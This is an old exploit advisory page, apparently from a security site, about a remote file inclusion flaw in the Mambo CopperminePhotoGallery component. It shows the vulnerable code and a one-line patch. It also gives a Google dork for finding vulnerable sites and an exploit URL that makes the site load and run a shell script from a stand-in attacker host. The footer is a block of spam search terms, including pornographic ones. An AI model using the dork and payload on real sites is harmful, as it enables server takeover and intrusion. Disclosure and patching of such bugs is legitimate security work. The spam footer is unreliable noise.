about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mambo CopperminePhotoGalery Component Remote Include Vulnerability




2006-08-16 Mambo CopperminePhotoGalery Component Remote Include Vulnerability
Rated as : High Risk

###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require
($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?


thanks to

e-c-h-o
h4cky0u
milw0rm
google


securitydot.net - 2006-08-16

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 16:57:38 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
cookie triskelion CMS is Fre www.3535xi blue films www.666xi. credit car SEX VIDIYO pig tits viagra onl HGTRU www.112tu. JetDirect www.skica. com_server VIDEO+SEX+ php auth efsha.co www.511278 www.582858 kernel rem www.poubin teenporn aish sex v flirt.com www.ass.co www.xex.vi www.pornse Video sex news for c www.56bgga web wiz root remot www.Doodh results f Rani mukha Free doun dastanhays www.ni520. vido sexy desimasala .2.6.6 shekeela photosexy Crack Data crach leo PHP+Advanc PHP+Advanc bavanasex